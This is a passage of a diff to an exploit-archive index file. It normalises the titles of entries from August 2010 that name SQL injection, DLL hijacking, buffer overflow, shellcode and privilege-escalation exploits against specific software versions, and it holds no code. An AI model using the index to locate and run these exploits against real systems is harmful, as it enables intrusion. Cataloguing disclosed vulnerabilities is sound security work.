Exploit",2010-08-03,jailbreakme,hardware,local,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,MadjiX,windows,remote,0 14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery Blind SQL Injection Vulnerability",2010-08-03,kaMtiEz,php,webapps,0 -14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos v2.0 - File Format DOS",2010-08-03,antrhacks,windows,dos,0 +14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format DOS",2010-08-03,antrhacks,windows,dos,0 14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow Vulnerability",2010-08-03,"Nahuel Riva",windows,remote,0 14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)",2010-08-04,"Oh Yaw Theng",windows,local,0 -14551,platforms/windows/remote/14551.html,"FathFTP v1.8 (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,MadjiX,windows,remote,0 +14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,MadjiX,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,MadjiX,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 14555,platforms/windows/dos/14555.py,"Mediamonkey v. 3.2.1.1297 DOS POC",2010-08-05,anonymous,windows,dos,0 14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection",2010-08-05,Metropolis,php,webapps,0 14557,platforms/php/webapps/14557.txt,"sX-Shop (view_image.php) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 14558,platforms/php/webapps/14558.txt,"sX-Shop Multiple SQL Injection Vulnerabilities",2010-08-05,CoBRa_21,php,webapps,0 -14559,platforms/php/webapps/14559.txt,"APBoard v2.1.0 (board.php?id=) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 -14560,platforms/php/webapps/14560.txt,"ccTiddly v1.7.6 Multiple Remote File Inclusion Vulnerabilities",2010-08-05,eidelweiss,php,webapps,0 -14562,platforms/php/webapps/14562.html,"Open Blog v1.2.1 CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - (board.php?id=) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 +14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusion Vulnerabilities",2010-08-05,eidelweiss,php,webapps,0 +14562,platforms/php/webapps/14562.html,"Open Blog 1.2.1 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14563,platforms/php/webapps/14563.html,"BXR v0.6.8 CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14564,platforms/php/webapps/14564.html,"Amethyst v0.1.5 XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14565,platforms/php/webapps/14565.html,"DiamondList v0.1.6 Cross Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 @@ -12754,13 +12754,13 @@ id,file,description,date,author,platform,type,port 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 -14576,platforms/windows/local/14576.c,"Mini-stream Ripper v3.1.2.1 Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 +14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 14578,platforms/php/webapps/14578.php,"PHPKick v0.8 statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 -14580,platforms/windows/remote/14580.html,"Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray 0-day",2010-08-08,"ThE g0bL!N",windows,remote,0 -14581,platforms/windows/local/14581.py,"myMP3-Player v3.0 Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0 +14580,platforms/windows/remote/14580.html,"Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray 0day",2010-08-08,"ThE g0bL!N",windows,remote,0 +14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0 14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0 -14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,indoushka,php,webapps,0 +14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,"indoushka salah el ddine",php,webapps,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,"hadji samir",windows,remote,0 14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 Denial of Service Vulnerability",2010-08-09,"Oh Yaw Theng",windows,dos,0 14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x Blind SQL Injection Vulnerability",2010-08-09,ItSecTeam,php,webapps,0 @@ -12773,10 +12773,10 @@ id,file,description,date,author,platform,type,port 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0 14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 -14600,platforms/windows/remote/14600.html,"SopCast v3.2.9 New 0Day Remote Exploit",2010-08-10,Sud0,windows,remote,0 +14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - (0Day) Remote Exploit",2010-08-10,Sud0,windows,remote,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH buffer overflow POC",2010-08-10,anonymous,windows,dos,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0 -14604,platforms/windows/remote/14604.py,"Easy FTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 +14604,platforms/windows/remote/14604.py,"Easy FTP - BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,MadjiX,windows,remote,0 14606,platforms/multiple/webapps/14606.html,"Zendesk Multiple Vulnerabilities",2010-08-10,"Luis Santana",multiple,webapps,0 14607,platforms/windows/dos/14607.py,"Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"Laurent Gaffie",windows,dos,0 @@ -12789,13 +12789,13 @@ id,file,description,date,author,platform,type,port 14614,platforms/php/webapps/14614.txt,"clearBudget v0.9.8 Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0 14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure Vulnerability",2010-08-11,Offensive,php,webapps,0 14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 -14618,platforms/php/webapps/14618.txt,"SaurusCMS v4.7.0 Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0 +14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdisk,php,webapps,0 -14623,platforms/windows/remote/14623.py,"Easy FTP Server v1.7.0.11 Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21 -14624,platforms/windows/dos/14624.py,"JaMP Player v4.2.2.0 Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0 -14625,platforms/windows/dos/14625.py,"CombiWave Lite v4.0.1.4 Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0 +14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21 +14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0 +14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win32/webapps/14628.txt,"PHP-Nuke-8.1-seo-Arabic Remote File Include",2010-08-12,LoSt.HaCkEr,win32,webapps,80 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - CSRF Change Admin Password",2010-08-12,"KOLTN S",multiple,webapps,80 14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 ""Universal"" SEH Buffer Overflow Exploit",2010-08-12,Dr_IDE,windows,local,0 @@ -12808,8 +12808,8 @@ id,file,description,date,author,platform,type,port 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion Directory Traversal Vulnerability",2010-08-14,unknown,multiple,remote,0 14642,platforms/windows/dos/14642.txt,"Acrobat Acrobat Font Parsing Integer Overflow Vulnerability",2010-08-14,"Ramz Afzar",windows,dos,0 14643,platforms/php/webapps/14643.txt,"sFileManager <= v.24a Local File Inclusion Vulnerability",2010-08-14,Pepelux,php,webapps,0 -14644,platforms/php/webapps/14644.html,"Multiple CSRF Vulnerabilities in Saurus CMS Admin Panel",2010-08-14,"Fady Mohammed Osman",php,webapps,0 -14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability",2010-08-14,LiquidWorm,php,webapps,0 +14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple CSRF Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0 +14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection Vulnerability",2010-08-14,LiquidWorm,php,webapps,0 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdisk,windows,dos,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0 14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 @@ -12820,21 +12820,21 @@ id,file,description,date,author,platform,type,port 14656,platforms/php/webapps/14656.txt,"Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability",2010-08-16,"Salvatore Fresta",php,webapps,0 14658,platforms/windows/remote/14658.txt,"123 Flashchat version 7.8 Multiple Remote Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14659,platforms/php/webapps/14659.txt,"Joomla Component OnGallery SQL Injection Vulnerability",2010-08-16,"al bayraqim",php,webapps,0 -14663,platforms/windows/local/14663.py,"MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit",2010-08-16,"Glafkos Charalambous ",windows,local,0 -14664,platforms/windows/local/14664.py,"MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous ",windows,local,0 +14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - (.m3u) Local Buffer Overflow Exploit",2010-08-16,"Glafkos Charalambous ",windows,local,0 +14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - (.pls) Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous ",windows,local,0 14666,platforms/windows/dos/14666.txt,"Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14667,platforms/windows/dos/14667.txt,"Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14668,platforms/windows/dos/14668.txt,"Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",windows,dos,0 14669,platforms/windows/dos/14669.txt,"Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest",2010-08-17,"Tavis Ormandy",windows,dos,0 14670,platforms/windows/dos/14670.txt,"Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14671,platforms/windows/dos/14671.py,"Brazip 9.0 (.zip File) Buffer Overflow Vulnerability (SEH)",2010-08-17,ItSecTeam,windows,dos,0 -14672,platforms/php/webapps/14672.txt,"Free Simple Software v1.0 Remote File Inclusion Vulnerability",2010-08-17,Dr.$audi,php,webapps,0 +14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion Vulnerability",2010-08-17,Dr.$audi,php,webapps,0 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0 -14674,platforms/windows/remote/14674.txt,"Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 +14674,platforms/windows/remote/14674.txt,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 14678,platforms/php/dos/14678.zip,"PHP 5.3.3 ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0 -14679,platforms/windows/dos/14679.pl,"VbsEdit v4.6.1.0 Denial of Service Vulnerability",2010-08-18,"C.G. Tan",windows,dos,0 -14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 +14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service Vulnerability",2010-08-18,"C.G. Tan",windows,dos,0 +14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC",2010-08-18,Dr_IDE,windows,dos,0 14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 Local File Disclosure Vulnerability",2010-08-18,"Nikola Petrov",php,webapps,0 14685,platforms/windows/dos/14685.pl,"RockN Wav Editor 1.8 Denial of Service Vulnerability",2010-08-18,d4rk-h4ck3r,windows,dos,0 @@ -12849,19 +12849,19 @@ id,file,description,date,author,platform,type,port 14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator Denial of Service Vulnerability",2010-08-20,PASSEWORD,windows,dos,0 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English MessageBoxA Shellcode - 87 bytes",2010-08-20,"Glafkos Charalambous ",windows,shellcode,0 14698,platforms/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service Vulnerability",2010-08-20,b0telh0,windows,dos,0 -14699,platforms/windows/dos/14699.py,"PlayPad Music Player v1.12 .mp3 Denial of Service Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0 +14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - (.mp3) Denial of Service Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0 14702,platforms/php/webapps/14702.txt,"Joomla Component com_zina SQL Injection Vulnerability",2010-08-21,"Th3 RDX",php,webapps,0 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0 14705,platforms/windows/dos/14705.c,"Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0 14706,platforms/windows/local/14706.py,"MS Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,Anonymous,windows,local,0 14707,platforms/php/webapps/14707.txt,"Joomla Component (com_Fabrik) SQL Injection Vulnerability",2010-08-21,Mkr0x,php,webapps,0 -14709,platforms/asp/webapps/14709.txt,"netStartEnterprise v4.0 SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 -14711,platforms/windows/dos/14711.py,"Tplayer V1R10 Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 +14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 +14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 14712,platforms/php/webapps/14712.txt,"4images 1.7.8 Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 14713,platforms/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 -14716,platforms/php/webapps/14716.txt,"AneCMS SQL Injection Vulnerability in /registre/next",2010-08-23,Sweet,php,webapps,0 +14716,platforms/php/webapps/14716.txt,"AneCMS /registre/next - SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 14717,platforms/php/webapps/14717.txt,"LINK CMS SQL Injection Vulnerability",2010-08-23,hacker@sr.gov.yu,php,webapps,0 14718,platforms/php/webapps/14718.txt,"Joomla Component (com_zoomportfolio) SQL Injection Vulnerability",2010-08-23,"Chip D3 Bi0s",php,webapps,0 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow Vulnerability",2010-08-23,"James Fitts",windows,local,0 @@ -12873,13 +12873,13 @@ id,file,description,date,author,platform,type,port 14728,platforms/windows/local/14728.c,"Windows Live Email DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 14730,platforms/windows/local/14730.c,"Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx)",2010-08-24,TheLeader,windows,local,0 -14732,platforms/windows/local/14732.c,"Opera v10.61 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 +14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 14733,platforms/windows/local/14733.c,"Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0 14734,platforms/windows/local/14734.c,"TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0 14739,platforms/windows/local/14739.c,"BS.Player <= 2.56 build 1043 DLL Hijacking Exploit (mfc71loc.dll)",2010-08-25,diwr,windows,local,0 -14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 <= 11.0 build 4909 DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 +14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)",2010-08-25,storm,windows,local,0 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 @@ -12894,14 +12894,14 @@ id,file,description,date,author,platform,type,port 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 DLL Hijacking Exploit (cpqdvd.dll)",2010-08-25,"Beenu Arora",windows,local,0 14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard DLL Hijacking Exploit (smmscrpt.dll)",2010-08-25,"Beenu Arora",windows,local,0 14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 DLL Hijacking Exploit (qtcf.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 -14756,platforms/windows/local/14756.c,"Safari v5.0.1 DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 +14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor DLL Hijacking Exploit (imm.dll)",2010-08-25,"Beenu Arora",windows,local,0 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Version Memory Corruption",2010-08-25,ItSecTeam,multiple,dos,0 14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)",2010-08-25,Anonymous,windows,local,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Encrypt3d.M!nd,windows,local,0 14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,Encrypt3d.M!nd,windows,local,0 14766,platforms/windows/local/14766.c,"Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 -14767,platforms/windows/dos/14767.txt,"Flash Movie Player v1.5 File Magic Denial of Service Vulnerability",2010-08-25,"Matthew Bergin",windows,dos,0 +14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service Vulnerability",2010-08-25,"Matthew Bergin",windows,dos,0 14768,platforms/windows/local/14768.c,"Roxio Creator DE DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 14769,platforms/windows/local/14769.c,"Nvidia Driver DLL Hijacking Exploit (nview.dll)",2010-08-25,Encrypt3d.M!nd,windows,local,0 14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 @@ -12915,26 +12915,26 @@ id,file,description,date,author,platform,type,port 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)",2010-08-25,storm,windows,local,0 14783,platforms/windows/local/14783.c,"Mozilla Thunderbird DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0 -14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 v5.0.298 DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0 -14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 v3.5.0.52 DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0 -14786,platforms/windows/local/14786.c,"CorelDRAW X3 v13.0.0.576 DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0 -14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 v13.0.0.576 DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0 +14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0 +14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0 +14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0 +14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0 14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,LiquidWorm,windows,local,0 14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0 -14790,platforms/windows/local/14790.c,"Google Earth v5.1.3535.3218 DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0 +14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0 14791,platforms/windows/local/14791.c,"Daemon tools lite DLL Hijacking Exploit (mfc80loc.dll)",2010-08-25,"Mohamed Clay",windows,local,0 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 dll Hijacking exploit (color.dll)",2010-08-25,"xsploited security",windows,local,0 14795,platforms/bsd/shellcode/14795.c,"bds/x86-bindshell on port 2525 shellcode - 167 bytes",2010-08-25,beosroot,bsd,shellcode,0 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant Remote File Inclusion Vulnerability",2010-08-26,LoSt.HaCkEr,php,webapps,0 14801,platforms/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 Multiple Cross Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0 -14806,platforms/php/webapps/14806.txt,"Prometeo v1.0.65 SQL Injection Vulnerability",2010-08-26,"Lord Tittis3000",php,webapps,0 +14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection Vulnerability",2010-08-26,"Lord Tittis3000",php,webapps,0 14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 Remote File Include Exploit",2010-08-26,bd0rk,php,webapps,0 14809,platforms/php/webapps/14809.txt,"Kontakt Formular 1.1 Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 14810,platforms/php/webapps/14810.txt,"Gaestebuch 1.2 Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0 -14815,platforms/php/webapps/14815.txt,"pecio CMS v2.0.5 Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0 +14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 Cross-site 